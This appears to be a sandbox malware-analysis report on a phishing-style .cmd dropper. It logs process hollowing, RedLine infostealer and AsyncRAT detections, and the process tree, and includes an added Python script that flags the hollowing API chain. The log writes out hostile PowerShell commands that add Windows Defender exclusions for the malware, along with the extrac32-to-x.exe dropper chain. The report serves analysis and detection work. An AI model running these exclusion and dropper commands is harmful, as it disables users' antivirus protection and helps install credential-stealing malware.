Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_040895CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 19_2_040895CC
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04089654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 19_2_04089654
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04089809 NtQueryInformationFile,NtReadFile,NtClose, 19_2_04089809
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083032 NtAllocateVirtualMemory, 19_2_04083032
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_0408396E NtReadVirtualMemory, 19_2_0408396E
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_0408421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_0408421A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 3_2_03F6A634
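The Code function lines above for x.exe and Rwelpqci.PIF are the evidence behind the "Sample uses process hollowing technique" signature: between them the two loaders import every step of the classic chain (NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, SetThreadContext/Wow64SetThreadContext, NtResumeThread). The following is an added example, not code from Joe Sandbox: it parses a selection of those report lines (copied verbatim) and reports, per binary, which hollowing stages the API chains cover. The stage-to-API mapping is this example's own, not the sandbox's scoring logic.

```python
"""Added example, not part of the Joe Sandbox report.

Reads the report's "Code function:" lines (copied verbatim below) and checks,
per binary, whether the imported API chains cover every stage of classic
process hollowing: unmap the target image, allocate, write, set the thread
context, resume. The stage mapping is this example's own, not the sandbox's.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Verbatim lines from the report (raw strings because of the Windows paths).
REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63380 NtWriteVirtualMemory, 3_2_03F63380",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 3_2_03F6421C",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63034 NtAllocateVirtualMemory, 3_2_03F63034",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F63B44 NtUnmapViewOfSection, 3_2_03F63B44",
    r"Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F6A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 3_2_03F6A634",
    r"Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083034 NtAllocateVirtualMemory, 19_2_04083034",
    r"Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_0408421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_0408421C",
    r"Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083B44 NtUnmapViewOfSection, 19_2_04083B44",
    r"Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_04083380 NtWriteVirtualMemory, 19_2_04083380",
    r"Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime, 28_2_0040128D",
]

# Each hollowing stage with the Nt and Win32 spellings of the APIs that implement it.
HOLLOWING_STAGES: Dict[str, Set[str]] = {
    "unmap":   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "alloc":   {"NtAllocateVirtualMemory", "VirtualAllocEx"},
    "write":   {"NtWriteVirtualMemory", "WriteProcessMemory"},
    "context": {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume":  {"NtResumeThread", "ResumeThread"},
}

_LINE_RE = re.compile(r"^Source: (?P<image>.+?) Code function: (?P<rest>.+)$")


def parse_code_function_line(line: str) -> Tuple[str, str, List[str]]:
    """Return (image path, function id, [api, ...]). Lines that carry no API
    list (just "<id> <id>") yield an empty list."""
    m = _LINE_RE.match(line)
    if not m:
        raise ValueError("not a Code function line")
    tokens = m["rest"].split()
    fid = tokens[0]
    apis = tokens[1].rstrip(",").split(",") if len(tokens) == 3 else []
    return m["image"], fid, apis


def stages_per_image(lines: List[str]) -> Dict[str, Set[str]]:
    """Union of hollowing stages seen across all functions of each binary."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        image, _fid, apis = parse_code_function_line(line)
        _ = seen[image]  # keep binaries with no matching API in the output
        for stage, names in HOLLOWING_STAGES.items():
            if names & set(apis):
                seen[image].add(stage)
    return dict(seen)


def assess_hollowing(lines: List[str]) -> Dict[str, Dict]:
    """Per binary: the sorted stage list and a verdict that fires only on a full chain."""
    return {
        image: {"stages": sorted(stages), "hollowing": len(stages) == len(HOLLOWING_STAGES)}
        for image, stages in stages_per_image(lines).items()
    }


if __name__ == "__main__":
    for image, result in assess_hollowing(REPORT_LINES).items():
        print(image, result)
```

Requiring the full chain keeps the verdict honest: XClient.exe imports none of these and drops out, while a binary that only allocates and writes into another process (injection without the unmap and context swap) would show a partial stage list rather than a hollowing verdict.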
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F520B4 3_2_03F520B4
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00408C60 9_1_00408C60
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0040DC11 9_1_0040DC11
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00407C3F 9_1_00407C3F
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00418CCC 9_1_00418CCC
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00406CA0 9_1_00406CA0
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004028B0 9_1_004028B0
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_0041A4BE 9_1_0041A4BE
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00418244 9_1_00418244
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00401650 9_1_00401650
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00402F20 9_1_00402F20
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004193C4 9_1_004193C4
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00418788 9_1_00418788
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00402F89 9_1_00402F89
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_00402B90 9_1_00402B90
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004073A0 9_1_004073A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00DDB490 16_2_00DDB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00DDB48B 16_2_00DDB48B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_08233EA8 16_2_08233EA8
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: 19_2_040720B4 19_2_040720B4
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00408C60 20_2_00408C60
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_0040DC11 20_2_0040DC11
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00407C3F 20_2_00407C3F
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00418CCC 20_2_00418CCC
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00406CA0 20_2_00406CA0
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_004028B0 20_2_004028B0
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_0041A4BE 20_2_0041A4BE
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00418244 20_2_00418244
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00401650 20_2_00401650
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00402F20 20_2_00402F20
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_004193C4 20_2_004193C4
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00418788 20_2_00418788
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00402F89 20_2_00402F89
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_00402B90 20_2_00402B90
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_004073A0 20_2_004073A0
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_2_1CC21030 20_2_1CC21030
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00408C60 20_1_00408C60
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_0040DC11 20_1_0040DC11
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00407C3F 20_1_00407C3F
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00418CCC 20_1_00418CCC
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00406CA0 20_1_00406CA0
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_004028B0 20_1_004028B0
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_0041A4BE 20_1_0041A4BE
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00418244 20_1_00418244
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00401650 20_1_00401650
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00402F20 20_1_00402F20
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_004193C4 20_1_004193C4
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00418788 20_1_00418788
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00402F89 20_1_00402F89
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_00402B90 20_1_00402B90
Source: C:\Users\user\Links\icqplewR.pif Code function: 20_1_004073A0 20_1_004073A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_04D0B4A0 22_2_04D0B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_04D0B490 22_2_04D0B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_08D83AA0 22_2_08D83AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_02F5B4A0 24_2_02F5B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_02F5B490 24_2_02F5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_08A73AA8 24_2_08A73AA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0340B490 26_2_0340B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0340B470 26_2_0340B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C93A98 26_2_08C93A98
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 28_2_004057B8 28_2_004057B8
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 29_2_004057B8 29_2_004057B8
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: String function: 0040A6C4 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 03F63E9C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 03F54414 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 03F63E20 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 03F5457C appears 835 times
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: String function: 03F5421C appears 64 times
Source: C:\Users\user\Links\icqplewR.pif Code function: String function: 0040D606 appears 72 times
Source: C:\Users\user\Links\icqplewR.pif Code function: String function: 0040E1D8 appears 132 times
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: String function: 04074414 appears 154 times
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: String function: 04083E20 appears 48 times
Source: C:\Users\user\Links\Rwelpqci.PIF Code function: String function: 0407457C appears 570 times
Source: 20.1.icqplewR.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.icqplewR.pif.4d88c8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.icqplewR.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.436038.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.Rwelpqci.PIF.226cc348.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.x.exe.229aebd8.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.4d88c8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.2.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.1.icqplewR.pif.467468.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.x.exe.2297d7a8.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.x.exe.2297d7a8.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 20.1.icqplewR.pif.436038.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000001.1347456184.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000001.1214724739.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000002.1417837790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.296c7830.0.raw.unpack, StaticNotifier.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winCMD@33/28@0/1
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_03F5793C GetDiskFreeSpaceA, 3_2_03F5793C
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_1_004019F0
Source: C:\Users\user\Links\icqplewR.pif Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_1_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\All Users\7435.cmd
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Users\user\Links\icqplewR.pif Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\CAB07752.TMP
Source: C:\Users\user\Links\icqplewR.pif Command line argument: 08A 9_1_00413780
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Links\Rwelpqci.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Links\Rwelpqci.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Links\icqplewR.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Links\icqplewR.pif File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ_HB648836_Enquiry.cmd ReversingLabs: Detection: 26%
Source: RFQ_HB648836_Enquiry.cmd Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\7435.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\38797.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Links\icqplewR.pif'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\Links\Rwelpqci.PIF "C:\Users\user\Links\Rwelpqci.PIF"
Source: C:\Users\user\Links\Rwelpqci.PIF Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'icqplewR.pif'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Links\icqplewR.pif Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_HB648836_Enquiry.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\7435.cmd""
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\38797.cmd""
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\Links\icqplewR.pif C:\\Users\\user\\Links\icqplewR.pif
